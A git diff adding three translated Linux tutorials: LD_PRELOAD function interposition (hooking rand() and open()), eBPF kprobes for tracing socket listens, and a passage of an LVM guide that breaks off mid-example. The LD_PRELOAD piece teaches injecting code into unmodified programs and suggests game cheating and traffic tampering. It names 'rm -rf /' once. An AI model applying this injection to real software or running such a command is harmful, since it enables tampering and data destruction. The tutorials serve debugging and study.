to cheat inject features and investigate programs.md new file mode 100644 index 0000000000..2329fadd41 --- /dev/null +++ b/sources/tech/20130402 Dynamic linker tricks Using LD_PRELOAD to cheat inject features and investigate programs.md @@ -0,0 +1,211 @@ +# Dynamic linker tricks: Using LD_PRELOAD to cheat, inject features and investigate programs + +**This post assumes some basic C skills.** + +Linux puts you in full control. This is not always seen from everyone’s perspective, but a power user loves to be in control. I’m going to show you a basic trick that lets you heavily influence the behavior of most applications, which is not only fun, but also, at times, useful. + +#### A motivational example + +Let us begin with a simple example. Fun first, science later. + + +random_num.c: +``` +#include +#include +#include + +int main(){ + srand(time(NULL)); + int i = 10; + while(i--) printf("%d\n",rand()%100); + return 0; +} +``` + +Simple enough, I believe. I compiled it with no special flags, just + +> ``` +> gcc random_num.c -o random_num +> ``` + +I hope the resulting output is obvious – ten randomly selected numbers 0-99, hopefully different each time you run this program. + +Now let’s pretend we don’t really have the source of this executable. Either delete the source file, or move it somewhere – we won’t need it. We will significantly modify this programs behavior, yet without touching it’s source code nor recompiling it. + +For this, lets create another simple C file: + + +unrandom.c: +``` +int rand(){ + return 42; //the most random number in the universe +} +``` + +We’ll compile it into a shared library. + +> ``` +> gcc -shared -fPIC unrandom.c -o unrandom.so +> ``` + +So what we have now is an application that outputs some random data, and a custom library, which implements the rand() function as a constant value of 42\.  Now… just run  _random_num _ this way, and watch the result: + +> ``` +> LD_PRELOAD=$PWD/unrandom.so ./random_nums +> ``` + +If you are lazy and did not do it yourself (and somehow fail to guess what might have happened), I’ll let you know – the output consists of ten 42’s. + +This may be even more impressive it you first: + +> ``` +> export LD_PRELOAD=$PWD/unrandom.so +> ``` + +and then run the program normally. An unchanged app run in an apparently usual manner seems to be affected by what we did in our tiny library… + +###### **Wait, what? What did just happen?** + +Yup, you are right, our program failed to generate random numbers, because it did not use the “real” rand(), but the one we provided – which returns 42 every time. + +###### **But we *told* it to use the real one. We programmed it to use the real one. Besides, at the time we created that program, the fake rand() did not even exist!** + +This is not entirely true. We did not choose which rand() we want our program to use. We told it just to use rand(). + +When our program is started, certain libraries (that provide functionality needed by the program) are loaded. We can learn which are these using  _ldd_ : + +> ``` +> $ ldd random_nums +> linux-vdso.so.1 => (0x00007fff4bdfe000) +> libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f48c03ec000) +> /lib64/ld-linux-x86-64.so.2 (0x00007f48c07e3000) +> ``` + +What you see as the output is the list of libs that are needed by  _random_nums_ . This list is built into the executable, and is determined compile time. The exact output might slightly differ on your machine, but a **libc.so** must be there – this is the file which provides core C functionality. That includes the “real” rand(). + +We can have a peek at what functions does libc provide. I used the following to get a full list: + +> ``` +> nm -D /lib/libc.so.6 +> ``` + +The  _nm_  command lists symbols found in a binary file. The -D flag tells it to look for dynamic symbols, which makes sense, as libc.so.6 is a dynamic library. The output is very long, but it indeed lists rand() among many other standard functions. + +Now what happens when we set up the environmental variable LD_PRELOAD? This variable **forces some libraries to be loaded for a program**. In our case, it loads  _unrandom.so_  for  _random_num_ , even though the program itself does not ask for it. The following command may be interesting: + +> ``` +> $ LD_PRELOAD=$PWD/unrandom.so ldd random_nums +> linux-vdso.so.1 => (0x00007fff369dc000) +> /some/path/to/unrandom.so (0x00007f262b439000) +> libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f262b044000) +> /lib64/ld-linux-x86-64.so.2 (0x00007f262b63d000) +> ``` + +Note that it lists our custom library. And indeed this is the reason why it’s code get’s executed:  _random_num_  calls rand(), but if  _unrandom.so_  is loaded it is our library that provides implementation for rand(). Neat, isn’t it? + +#### Being transparent + +This is not enough. I’d like to be able to inject some code into an application in a similar manner, but in such way that it will be able to function normally. It’s clear if we implemented open() with a simple “ _return 0;_ “, the application we would like to hack should malfunction. The point is to be **transparent**, and to actually call the original open: + +inspect_open.c: +``` +int open(const char *pathname, int flags){ + /* Some evil injected code goes here. */ + return open(pathname,flags); // Here we call the "real" open function, that is provided to us by libc.so +} +``` + +Hm. Not really. This won’t call the “original” open(…). Obviously, this is an endless recursive call. + +How do we access the “real” open function? It is needed to use the programming interface to the dynamic linker. It’s simpler than it sounds. Have a look at this complete example, and then I’ll explain what happens there: + +inspect_open.c: + +``` +#define _GNU_SOURCE +#include + +typedef int (*orig_open_f_type)(const char *pathname, int flags); + +int open(const char *pathname, int flags, ...) +{ + /* Some evil injected code goes here. */ + + orig_open_f_type orig_open; + orig_open = (orig_open_f_type)dlsym(RTLD_NEXT,"open"); + return orig_open(pathname,flags); +} +``` + +The  _dlfcn.h_  is needed for  _dlsym_  function we use later. That strange  _#define_  directive instructs the compiler to enable some non-standard stuff, we need it to enable  _RTLD_NEXT_  in  _dlfcn.h_ . That typedef is just creating an alias to a complicated pointer-to-function type, with arguments just as the original open – the alias name is  _orig_open_f_type_ , which we’ll use later. + +The body of our custom open(…) consists of some custom code. The last part of it creates a new function pointer  _orig_open_  which will point to the original open(…) function. In order to get the address of that function, we ask  _dlsym_  to find for us the next “open” function on dynamic libraries stack. Finally, we call that function (passing the same arguments as were passed to our fake “open”), and return it’s return value as ours. + +As the “evil injected code” I simply used: + +inspect_open.c (fragment): + +``` +printf("The victim used open(...) to access '%s'!!!\n",pathname); //remember to include stdio.h! +``` + +To compile it, I needed to slightly adjust compiler flags: + +> ``` +> gcc -shared -fPIC  inspect_open.c -o inspect_open.so -ldl +> ``` + +I had to append  _-ldl_ , so that this shared library is linked to  _libdl_ , which provides the  _dlsym_  function. (Nah, I am not going to create a fake version of  _dlsym_ , though this might be fun.) + +So what do I have in result? A shared library, which implements the open(…) function so that it behaves **exactly** as the real open(…)… except it has a side effect of  _printf_ ing the file path :-) + +If you are not convinced this is a powerful trick, it’s the time you tried the following: + +> ``` +> LD_PRELOAD=$PWD/inspect_open.so gnome-calculator +> ``` + +I encourage you to see the result yourself, but basically it lists every file this application accesses. In real time. + +I believe it’s not that hard to imagine why this might be useful for debugging or investigating unknown applications. Please note, however, that this particular trick is not quite complete, because  _open()_  is not the only function that opens files… For example, there is also  _open64()_  in the standard library, and for full investigation you would need to create a fake one too. + +#### **Possible uses** + +If you are still with me and enjoyed the above, let me suggest a bunch of ideas of what can be achieved using this trick. Keep in mind that you can do all the above without to source of the affected app! + +1. ~~Gain root privileges.~~ Not really, don’t even bother, you won’t bypass any security this way. (A quick explanation for pros: no libraries will be preloaded this way if ruid != euid) + +2. Cheat games: **Unrandomize.** This is what I did in the first example. For a fully working case you would need also to implement a custom  _random()_ ,  _rand_r()_ _, random_r()_ . Also some apps may be reading from  _/dev/urandom_  or so, you might redirect them to  _/dev/null_  by running the original  _open()_  with a modified file path. Furthermore, some apps may have their own random number generation algorithm, there is little you can do about that (unless: point 10 below). But this looks like an easy exercise for beginners. + +3. Cheat games: **Bullet time. **Implement all standard time-related functions pretend the time flows two times slower. Or ten times slower. If you correctly calculate new values for time measurement, timed  _sleep_ functions, and others, the affected application will believe the time runs slower (or faster, if you wish), and you can experience awesome bullet-time action. + Or go **even one step further** and let your shared library also be a DBus client, so that you can communicate with it real time. Bind some shortcuts to custom commands, and with some additional calculations in your fake timing functions you will be able to enable&disable the slow-mo or fast-forward anytime you wish. + +4. Investigate apps: **List accessed files.** That’s what my second example does, but this could be also pushed further, by recording and monitoring all app’s file I/O. + +5. Investigate apps: **Monitor internet access.** You might do this with Wireshark or similar software, but with this trick you could actually gain control of what an app sends over the web, and not just look, but also affect the exchanged data. Lots of possibilities here, from detecting spyware, to cheating in multiplayer games, or analyzing & reverse-engineering protocols of closed-source applications. + +6. Investigate apps: **Inspect GTK structures.** Why just limit ourselves to standard library? Let’s inject code in all GTK calls, so that we can learn what widgets does an app use, and how are they structured. This might be then rendered either to an image or even to a gtkbuilder file! Super useful if you want to learn how does some app manage its interface! + +7. **Sandbox unsafe applications.** If you don’t trust some app and are afraid that it may wish to _ rm -rf / _ or do some other unwanted file activities, you might potentially redirect all it’s file IO to e.g. /tmp by appropriately modifying the arguments it passes to all file-related functions (not just  _open_ , but also e.g. removing directories etc.). It’s more difficult trick that a chroot, but it gives you more control. It would be only as safe as complete your “wrapper” was, and unless you really know what you’re doing, don’t actually run any malicious software this way. + +8. **Implement features.** [zlibc][1] is an actual library which is run this precise way; it uncompresses files on the go as they are accessed, so that any application can work on compressed data without even realizing it. + +9. **Fix bugs. **Another real-life example: some time ago (I am not sure this is still the case) Skype – which is closed-source – had problems capturing video from some certain webcams. Because the source could not be modified as Skype is not free software, this was fixed by preloading a library that would correct these problems with video. + +10. Manually **access application’s own memory**. Do note that you can access all app data this way. This may be not impressive if you are familiar with software like CheatEngine/scanmem/GameConqueror, but they all require root privileges to work. LD_PRELOAD does not. In fact, with a number of clever tricks your injected code might access all app memory, because, in fact, it gets executed by that application itself. You might modify everything this application can. You can probably imagine this allows a lot of low-level hacks… but I’ll post an article about it another time. + +These are only the ideas I came up with. I bet you can find some too, if you do – share them by commenting! + +-------------------------------------------------------------------------------- + +via: https://rafalcieslak.wordpress.com/2013/04/02/dynamic-linker-tricks-using-ld_preload-to-cheat-inject-features-and-investigate-programs/ + +作者:[Rafał Cieślak ][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://rafalcieslak.wordpress.com/ +[1]:http://www.zlibc.linux.lu/index.html diff --git a/sources/tech/20160330 How to turn any syscall into an event Introducing eBPF Kernel probes.md b/sources/tech/20160330 How to turn any syscall into an event Introducing eBPF Kernel probes.md new file mode 100644 index 0000000000..a53270f2d7 --- /dev/null +++ b/sources/tech/20160330 How to turn any syscall into an event Introducing eBPF Kernel probes.md @@ -0,0 +1,361 @@ +How to turn any syscall into an event: Introducing eBPF Kernel probes +============================================================ + + +TL;DR: Using eBPF in recent (>=4.4) Linux kernel, you can turn any kernel function call into a user land event with arbitrary data. This is made easy by bcc. The probe is written in C while the data is handled by python. + +If you are not familiar with eBPF or linux tracing, you really should read the full post. It tries to progressively go through the pitfalls I stumbled unpon while playing around with bcc / eBPF while saving you a lot of the time I spent searching and digging. + +### A note on push vs pull in a Linux world + +When I started to work on containers, I was wondering how we could update a load balancer configuration dynamically based on actual system state. A common strategy, which works, it to let the container orchestrator trigger a load balancer configuration update whenever it starts a container and then let the load balancer poll the container until some health check passes. It may be a simple “SYN” test. + +While this configuration works, it has the downside of making your load balancer waiting for some system to be available while it should be… load balancing. + +Can we do better? + +When you want a program to react to some change in a system there are 2 possible strategies. The program may  _poll_  the system to detect changes or, if the system supports it, the system may  _push_ events and let the program react to them. Wether you want to use push or poll depends on the context. A good rule of the thumb is to use push events when the event rate is low with respect to the processing time and switch to polling when the events are coming fast or the system may become unusable. For example, typical network driver will wait for events from the network card while frameworks like dpdk will actively poll the card for events to achieve the highest throughput and lowest latency. + +In an ideal world, we’d have some kernel interface telling us: + +> * “Hey Mr. ContainerManager, I’ve just created a socket for the Nginx-ware of container  _servestaticfiles_ , maybe you want to update your state?” +> +> * “Sure Mr. OS, Thanks for letting me know” + +While Linux has a wide range of interfaces to deal with events, up to 3 for file events, there is no dedicated interface to get socket event notifications. You can get routing table events, neighbor table events, conntrack events, interface change events. Just, not socket events. Or maybe there is, deep hidden in a Netlink interface. + +Ideally, we’d need a generic way to do it. How? + +### Kernel tracing and eBPF, a bit of history + +Until recently the only way was to patch the kernel or resort on SystemTap. [SytemTap][5] is a tracing Linux system. In a nutshell, it provides a DSL which is then compiled into a kernel module which is then live-loaded into the running kernel. Except that some production system disable dynamic module loading for security reasons. Including the one I was working on at that time. The other way would be to patch the kernel to trigger some events, probably based on netlink. This is not really convenient. Kernel hacking come with downsides including “interesting” new “features” and increased maintenance burden. + +Hopefully, starting with Linux 3.15 the ground was laid to safely transform any traceable kernel function into userland events. “Safely” is common computer science expression referring to “some virtual machine”. This case is no exception. Linux has had one for years. Since Linux 2.1.75 released in 1997 actually. It’s called Berkeley Packet Filter of BPF for short. As its name suggests, it was originally developed for the BSD firewalls. It had only 2 registers and only allowed forward jumps meaning that you could not write loops with it (Well, you can, if you know the maximum iterations and you manually unroll them). The point was to guarantee the program would always terminate and hence never hang the system. Still not sure if it has any use while you have iptables? It serves as the [foundation of CloudFlare’s AntiDDos protection][6]. + +OK, so, with Linux the 3.15, [BPF was extended][7] turning it into eBPF. For “extended” BPF. It upgrades from 2 32 bits registers to 10 64 bits 64 registers and adds backward jumping among others. It has then been [further extended in Linux 3.18][8] moving it out of the networking subsystem, and adding tools like maps. To preserve the safety guarantees, it [introduces a checker][9] which validates all memory accesses and possible code path. If the checker can’t guarantee the code will terminate within fixed boundaries, it will deny the initial insertion of the program. + +For more history, there is [an excellent Oracle presentation on eBPF][10]. + +Let’s get started. + +### Hello from from `inet_listen` + +As writing assembly is not the most convenient task, even for the best of us, we’ll use [bcc][11]. bcc is a collection of tools based on LLVM and Python abstracting the underlying machinery. Probes are written in C and the results can be exploited from python allowing to easily write non trivial applications. + +Start by install bcc. For some of these examples, you may require a recent (read >= 4.4) version of the kernel. If you are willing to actually try these examples, I highly recommend that you setup a VM.  _NOT_  a docker container. You can’t change the kernel in a container. As this is a young and dynamic projects, install instructions are highly platform/version dependant. You can find up to date instructions on [https://github.com/iovisor/bcc/blob/master/INSTALL.md][12] + +So, we want to get an event whenever a program starts to listen on TCP socket. When calling the `listen()` syscall on a `AF_INET` + `SOCK_STREAM` socket, the underlying kernel function is [`inet_listen`][13]. We’ll start by hooking a “Hello World” `kprobe` on it’s entrypoint. + +``` +from bcc import BPF + +# Hello BPF Program +bpf_text = """ +#include +#include + +// 1\. Attach kprobe to "inet_listen" +int kprobe__inet_listen(struct pt_regs *ctx, struct socket *sock, int backlog) +{ + bpf_trace_printk("Hello World!\\n"); + return 0; +}; +""" + +# 2\. Build and Inject program +b = BPF(text=bpf_text) + +# 3\. Print debug output +while True: + print b.trace_readline() + +``` + +This program does 3 things: 1\. It attaches a kernel probe to “inet_listen” using a naming convention. If the function was called, say, “my_probe”, it could be explicitly attached with `b.attach_kprobe("inet_listen", "my_probe"`. 2\. It builds the program using LLVM new BPF backend, inject the resulting bytecode using the (new) `bpf()` syscall and automatically attaches the probes matching the naming convention. 3\. It reads the raw output from the kernel pipe. + +Note: eBPF backend of LLVM is still young. If you think you’ve hit a bug, you may want to upgrade. + +Noticed the `bpf_trace_printk` call? This is a stripped down version of the kernel’s `printk()`debug function. When used, it produces tracing informations to a special kernel pipe in `/sys/kernel/debug/tracing/trace_pipe`. As the name implies, this is a pipe. If multiple readers are consuming it, only 1 will get a given line. This makes it unsuitable for production. + +Fortunately, Linux 3.19 introduced maps for message passing and Linux 4.4 brings arbitrary perf events support. I’ll demo the perf event based approach later in this post. + +``` +# From a first console +ubuntu@bcc:~/dev/listen-evts$ sudo /python tcv4listen.py + nc-4940 [000] d... 22666.991714: : Hello World! + +# From a second console +ubuntu@bcc:~$ nc -l 0 4242 +^C + +``` + +Yay! + +### Grab the backlog + +Now, let’s print some easily accessible data. Say the “backlog”. The backlog is the number of pending established TCP connections, pending to be `accept()`ed. + +Just tweak a bit the `bpf_trace_printk`: + +``` +bpf_trace_printk("Listening with with up to %d pending connections!\\n", backlog); + +``` + +If you re-run the example with this world-changing improvement, you should see something like: + +``` +(bcc)ubuntu@bcc:~/dev/listen-evts$ sudo python tcv4listen.py + nc-5020 [000] d... 25497.154070: : Listening with with up to 1 pending connections! + +``` + +`nc` is a single connection program, hence the backlog of 1\. Nginx or Redis would output 128 here. But that’s another story. + +Easy hue? Now let’s get the port. + +### Grab the port and IP + +Studying `inet_listen` source from the kernel, we know that we need to get the `inet_sock` from the `socket` object. Just copy from the sources, and insert at the beginning of the tracer: + +``` +// cast types. Intermediate cast not needed, kept for readability +struct sock *sk = sock->sk; +struct inet_sock *inet = inet_sk(sk); + +``` + +The port can now be accessed from `inet->inet_sport` in network byte order (aka: Big Endian). Easy! So, we could just replace the `bpf_trace_printk` with: + +``` +bpf_trace_printk("Listening on port %d!\\n", inet->inet_sport); + +``` + +Then run: + +``` +ubuntu@bcc:~/dev/listen-evts$ sudo /python tcv4listen.py +... +R1 invalid mem access 'inv' +... +Exception: Failed to load BPF program kprobe__inet_listen + +``` + +Except that it’s not (yet) so simple. Bcc is improving a  _lot_  currently. While writing this post, a couple of pitfalls had already been addressed. But not yet all. This Error means the in-kernel checker could prove the memory accesses in program are correct. See the explicit cast. We need to help is a little by making the accesses more explicit. We’ll use `bpf_probe_read` trusted function to read an arbitrary memory location while guaranteeing all necessary checks are done with something like: + +``` +// Explicit initialization. The "=0" part is needed to "give life" to the variable on the stack +u16 lport = 0; + +// Explicit arbitrary memory access. Read it: +// Read into 'lport', 'sizeof(lport)' bytes from 'inet->inet_sport' memory location +bpf_probe_read(&lport, sizeof(lport), &(inet->inet_sport)); + +``` + +Reading the bound address for IPv4 is basically the same, using `inet->inet_rcv_saddr`. If we put is all together, we should get the backlog, the port and the bound IP: + +``` +from bcc import BPF + +# BPF Program +bpf_text = """ +#include +#include +#include + +// Send an event for each IPv4 listen with PID, bound address and port +int kprobe__inet_listen(struct pt_regs *ctx, struct socket *sock, int backlog) +{ + // Cast types. Intermediate cast not needed, kept for readability + struct sock *sk = sock->sk; + struct inet_sock *inet = inet_sk(sk); + + // Working values. You *need* to initialize them to give them "life" on the stack and use them afterward + u32 laddr = 0; + u16 lport = 0; + + // Pull in details. As 'inet_sk' is internally a type cast, we need to use 'bpf_probe_read' + // read: load into 'laddr' 'sizeof(laddr)' bytes from address 'inet->inet_rcv_saddr' + bpf_probe_read(&laddr, sizeof(laddr), &(inet->inet_rcv_saddr)); + bpf_probe_read(&lport, sizeof(lport), &(inet->inet_sport)); + + // Push event + bpf_trace_printk("Listening on %x %d with %d pending connections\\n", ntohl(laddr), ntohs(lport), backlog); + return 0; +}; +""" + +# Build and Inject BPF +b = BPF(text=bpf_text) + +# Print debug output +while True: + print b.trace_readline() + +``` + +A test run should output something like: + +``` +(bcc)ubuntu@bcc:~/dev/listen-evts$ sudo python tcv4listen.py + nc-5024 [000] d... 25821.166286: : Listening on 7f000001 4242 with 1 pending connections + +``` + +Provided that you listen on localhost. The address is displayed as hex here to avoid dealing with the IP pretty printing but that’s all wired. And that’s cool. + +Note: you may wonder why `ntohs` and `ntohl` can be called from BPF while they are not trusted. This is because they are macros and inline functions from “.h” files and a small bug was [fixed][14]while writing this post. + +All done, one more piece: We want to get the related container. In the context of networking, that’s means we want the network namespace. The network namespace being the building block of containers allowing them to have isolated networks. + +### Grab the network namespace: a forced introduction to perf events + +On the userland, the network namespace can be determined by checking the target of `/proc/PID/ns/net`. It should look like `net:[4026531957]`. The number between brackets is the inode number of the network namespace. This said, we could grab it by scrapping ‘/proc’ but this is racy, we may be dealing with short-lived processes. And races are never good. We’ll grab the inode number directly from the kernel. Fortunately, that’s an easy one: + +``` +// Create an populate the variable +u32 netns = 0; + +// Read the netns inode number, like /proc does +netns = sk->__sk_common.skc_net.net->ns.inum; + +``` + +Easy. And it works. + +But if you’ve read so far, you may guess there is something wrong somewhere. And there is: + +``` +bpf_trace_printk("Listening on %x %d with %d pending connections in container %d\\n", ntohl(laddr), ntohs(lport), backlog, netns); + +``` + +If you try to run it, you’ll get some cryptic error message: + +``` +(bcc)ubuntu@bcc:~/dev/listen-evts$ sudo python tcv4listen.py +error: in function kprobe__inet_listen i32 (%struct.pt_regs*, %struct.socket*, i32) +too many args to 0x1ba9108: i64 = Constant<6> + +``` + +What clang is trying to tell you is “Hey pal, `bpf_trace_printk` can only take 4 arguments, you’ve just used 5.“. I won’t dive into the details here, but that’s a BPF limitation. If you want to dig it, [here is a good starting point][15]. + +The only way to fix it is to… stop debugging and make it production ready. So let’s get started (and make sure run at least Linux 4.4). We’ll use perf events which supports passing arbitrary sized structures to userland. Additionally, only our reader will get it so that multiple unrelated eBPF programs can produce data concurrently without issues. + +To use it, we need to: + +1. define a structure + +2. declare the event + +3. push the event + +4. re-declare the event on Python’s side (This step should go away in the future) + +5. consume and format the event + +This may seem like a lot, but it ain’t. See: + +``` +// At the begining of the C program, declare our event +struct listen_evt_t { + u64 laddr; + u64 lport; + u64 netns; + u64 backlog; +}; +BPF_PERF_OUTPUT(listen_evt); + +// In kprobe__inet_listen, replace the printk with +struct listen_evt_t evt = { + .laddr = ntohl(laddr), + .lport = ntohs(lport), + .netns = netns, + .backlog = backlog, +}; +listen_evt.perf_submit(ctx, &evt, sizeof(evt)); + +``` + +Python side will require a little more work, though: + +``` +# We need ctypes to parse the event structure +import ctypes + +# Declare data format +class ListenEvt(ctypes.Structure): + _fields_ = [ + ("laddr", ctypes.c_ulonglong), + ("lport", ctypes.c_ulonglong), + ("netns", ctypes.c_ulonglong), + ("backlog", ctypes.c_ulonglong), + ] + +# Declare event printer +def print_event(cpu, data, size): + event = ctypes.cast(data, ctypes.POINTER(ListenEvt)).contents + print("Listening on %x %d with %d pending connections in container %d" % ( + event.laddr, + event.lport, + event.backlog, + event.netns, + )) + +# Replace the event loop +b["listen_evt"].open_perf_buffer(print_event) +while True: + b.kprobe_poll() + +``` + +Give it a try. In this example, I have a redis running in a docker container and nc on the host: + +``` +(bcc)ubuntu@bcc:~/dev/listen-evts$ sudo python tcv4listen.py +Listening on 0 6379 with 128 pending connections in container 4026532165 +Listening on 0 6379 with 128 pending connections in container 4026532165 +Listening on 7f000001 6588 with 1 pending connections in container 4026531957 + +``` + +### Last word + +Absolutely everything is now setup to use trigger events from arbitrary function calls in the kernel using eBPF, and you should have seen most of the common pitfalls I hit while learning eBPF. If you want to see the full version of this tool, along with some more tricks like IPv6 support, have a look at [https://github.com/iovisor/bcc/blob/master/tools/solisten.py][16]. It’s now an official tool, thanks to the support of the bcc team. + +To go further, you may want to checkout Brendan Gregg’s blog, in particular [the post about eBPF maps and statistics][17]. He his one of the project’s main contributor. + + +-------------------------------------------------------------------------------- + +via: https://blog.yadutaf.fr/2016/03/30/turn-any-syscall-into-event-introducing-ebpf-kernel-probes/ + +作者:[Jean-Tiare Le Bigot ][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://blog.yadutaf.fr/about +[1]:https://blog.yadutaf.fr/tags/linux +[2]:https://blog.yadutaf.fr/tags/tracing +[3]:https://blog.yadutaf.fr/tags/ebpf +[4]:https://blog.yadutaf.fr/tags/bcc +[5]:https://en.wikipedia.org/wiki/SystemTap +[6]:https://blog.cloudflare.com/bpf-the-forgotten-bytecode/ +[7]:https://blog.yadutaf.fr/2016/03/30/turn-any-syscall-into-event-introducing-ebpf-kernel-probes/TODO +[8]:https://lwn.net/Articles/604043/ +[9]:http://lxr.free-electrons.com/source/kernel/bpf/verifier.c#L21 +[10]:http://events.linuxfoundation.org/sites/events/files/slides/tracing-linux-ezannoni-linuxcon-ja-2015_0.pdf +[11]:https://github.com/iovisor/bcc +[12]:https://github.com/iovisor/bcc/blob/master/INSTALL.md +[13]:http://lxr.free-electrons.com/source/net/ipv4/af_inet.c#L194 +[14]:https://github.com/iovisor/bcc/pull/453 +[15]:http://lxr.free-electrons.com/source/kernel/trace/bpf_trace.c#L86 +[16]:https://github.com/iovisor/bcc/blob/master/tools/solisten.py +[17]:http://www.brendangregg.com/blog/2015-05-15/ebpf-one-small-step.html diff --git a/sources/tech/20160922 A Linux users guide to Logical Volume Management.md b/sources/tech/20160922 A Linux users guide to Logical Volume Management.md new file mode 100644 index 0000000000..ff0e390f38 --- /dev/null +++ b/sources/tech/20160922 A Linux users guide to Logical Volume Management.md @@ -0,0 +1,233 @@ +A Linux user's guide to Logical Volume Management +============================================================ + +![Logical Volume Management (LVM)](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/rh_003499_01_other11x_cc.png?itok=I_kCDYj0 "Logical Volume Management (LVM)") +Image by : opensource.com + +Managing disk space has always been a significant task for sysadmins. Running out of disk space used to be the start of a long and complex series of tasks to increase the space available to a disk partition. It also required taking the system off-line. This usually involved installing a new hard drive, booting to recovery or single-user mode, creating a partition and a filesystem on the new hard drive, using temporary mount points to move the data from the too-small filesystem to the new, larger one, changing the content of the /etc/fstab file to reflect the correct device name for the new partition, and rebooting to remount the new filesystem on the correct mount point. + +I have to tell you that, when LVM (Logical Volume Manager) first made its appearance in Fedora Linux, I resisted it rather strongly. My initial reaction was that I did not need this additional layer of abstraction between me and the hard drives. It turns out that I was wrong, and that logical volume management is very useful. + +LVM allows for very flexible disk space management. It provides features like the ability to add disk space to a logical volume and its filesystem while that filesystem is mounted and active and it allows for the collection of multiple physical hard drives and partitions into a single volume group which can then be divided into logical volumes. + +The volume manager also allows reducing the amount of disk space allocated to a logical volume, but there are a couple requirements. First, the volume must be unmounted. Second, the filesystem itself must be reduced in size before the volume on which it resides can be reduced. + +It is important to note that the filesystem itself must allow resizing for this feature to work. The EXT2, 3, and 4 filesystems all allow both offline (unmounted) and online (mounted) resizing when increasing the size of a filesystem, and offline resizing when reducing the size. You should check the details of the filesystems you intend to use in order to verify whether they can be resized at all and especially whether they can be resized while online. + +### Expanding a filesystem on the fly + +I always like to run new distributions in a VirtualBox virtual machine for a few days or weeks to ensure that I will not run into any devastating problems when I start installing it on my production machines. One morning a couple years ago I started installing a newly released version of Fedora in a virtual machine on my primary workstation. I thought that I had enough disk space allocated to the host filesystem in which the VM was being installed. I did not. About a third of the way through the installation I ran out of space on that filesystem. Fortunately, VirtualBox detected the out-of-space condition and paused the virtual machine, and even displayed an error message indicating the exact cause of the problem. + +Note that this problem was not due to the fact that the virtual disk was too small, it was rather the logical volume on the host computer that was running out of space so that the virtual disk belonging to the virtual machine did not have enough space to expand on the host's logical volume. + +Since most modern distributions use Logical Volume Management by default, and I had some free space available on the volume group, I was able to assign additional disk space to the appropriate logical volume and then expand filesystem of the host on the fly. This means that I did not have to reformat the entire hard drive and reinstall the operating system or even reboot. I simply assigned some of the available space to the appropriate logical volume and resized the filesystem—all while the filesystem was on-line and the running program, The virtual machine was still using the host filesystem. After resizing the logical volume and the filesystem I resumed running the virtual machine and the installation continued as if no problems had occurred. + +Although this type of problem may never have happened to you, running out of disk space while a critical program is running has happened to many people. And while many programs, especially Windows programs, are not as well written and resilient as VirtualBox, Linux Logical Volume Management made it possible to recover without losing any data and without having to restart the time-consuming installation. + +### LVM Structure + +The structure of a Logical Volume Manager disk environment is illustrated by Figure 1, below. Logical Volume Management enables the combining of multiple individual hard drives and/or disk partitions into a single volume group (VG). That volume group can then be subdivided into logical volumes (LV) or used as a single large volume. Regular file systems, such as EXT3 or EXT4, can then be created on a logical volume. + +In Figure 1, two complete physical hard drives and one partition from a third hard drive have been combined into a single volume group. Two logical volumes have been created from the space in the volume group, and a filesystem, such as an EXT3 or EXT4 filesystem has been created on each of the two logical volumes. + +![lvm.png](https://opensource.com/sites/default/files/resize/images/life-uploads/lvm-520x222.png) + + _Figure 1: LVM allows combining partitions and entire hard drives into Volume Groups._ + +Adding disk space to a host is fairly straightforward but, in my experience, is done relatively infrequently. The basic steps needed are listed below. You can either create an entirely new volume group or you can add the new space to an existing volume group and either expand an existing logical volume or create a new one. + +### Adding a new logical volume + +There are times when it is necessary to add a new logical volume to a host. For example, after noticing that the directory containing virtual disks for my VirtualBox virtual machines was filling up the /home filesystem, I decided to create a new logical volume in which to store the virtual machine data, including the virtual disks. This would free up a great deal of space in my /home filesystem and also allow me to manage the disk space for the VMs independently. + +The basic steps for adding a new logical volume are as follows. + +1. If necessary, install a new hard drive. + +2. Optional: Create a partition on the hard drive. + +3. Create a physical volume (PV) of the complete hard drive or a partition on the hard drive. + +4. Assign the new physical volume to an existing volume group (VG) or create a new volume group. + +5. Create a new logical volumes (LV) from the space in the volume group. + +6. Create a filesystem on the new logical volume. + +7. Add appropriate entries to /etc/fstab for mounting the filesystem. + +8. Mount the filesystem. + +Now for the details. The following sequence is taken from an example I used as a lab project when teaching about Linux filesystems. + +### Example + +This example shows how to use the CLI to extend an existing volume group to add more space to it, create a new logical volume in that space, and create a filesystem on the logical volume. This procedure can be performed on a running, mounted filesystem. + +WARNING: Only the EXT3 and EXT4 filesystems can be resized on the fly on a running, mounted filesystem. Many other filesystems including BTRFS and ZFS cannot be resized. + +### Install hard drive + +If there is not enough space in the volume group on the existing hard drive(s) in the system to add the desired amount of space it may be necessary to add a new hard drive and create the space to add to the Logical Volume. First, install the physical hard drive, and then perform the following steps. + +### Create Physical Volume from hard drive + +It is first necessary to create a new Physical Volume (PV). Use the command below, which assumes that the new hard drive is assigned as /dev/hdd. + +``` +pvcreate /dev/hdd +``` + +It is not necessary to create a partition of any kind on the new hard drive. This creation of the Physical Volume which will be recognized by the Logical Volume Manager can be performed on a newly installed raw disk or on a Linux partition of type 83\. If you are going to use the entire hard drive, creating a partition first does not offer any particular advantages and uses disk space for metadata that could otherwise be used as part of the PV. + +### Extend the existing Volume Group + +In this example we will extend an existing volume group rather than creating a new one; you can choose to do it either way. After the Physical Volume has been created, extend the existing Volume Group (VG) to include the space on the new PV. In this example the existing Volume Group is named MyVG01. + +``` +vgextend /dev/MyVG01 /dev/hdd +``` + +### Create the Logical Volume + +First create the Logical Volume (LV) from existing free space within the Volume Group. The command below creates a LV with a size of 50GB. The Volume Group name is MyVG01 and the Logical Volume Name is Stuff. + +``` +lvcreate -L +50G --name Stuff MyVG01 +``` + +### Create the filesystem + +Creating the Logical Volume does not create the filesystem. That task must be performed separately. The command below creates an EXT4 filesystem that fits the newly created Logical Volume. + +``` +mkfs -t ext4 /dev/MyVG01/Stuff +``` + +### Add a filesystem label + +Adding a filesystem label makes it easy to identify the filesystem later in case of a crash or other disk related problems. + +``` 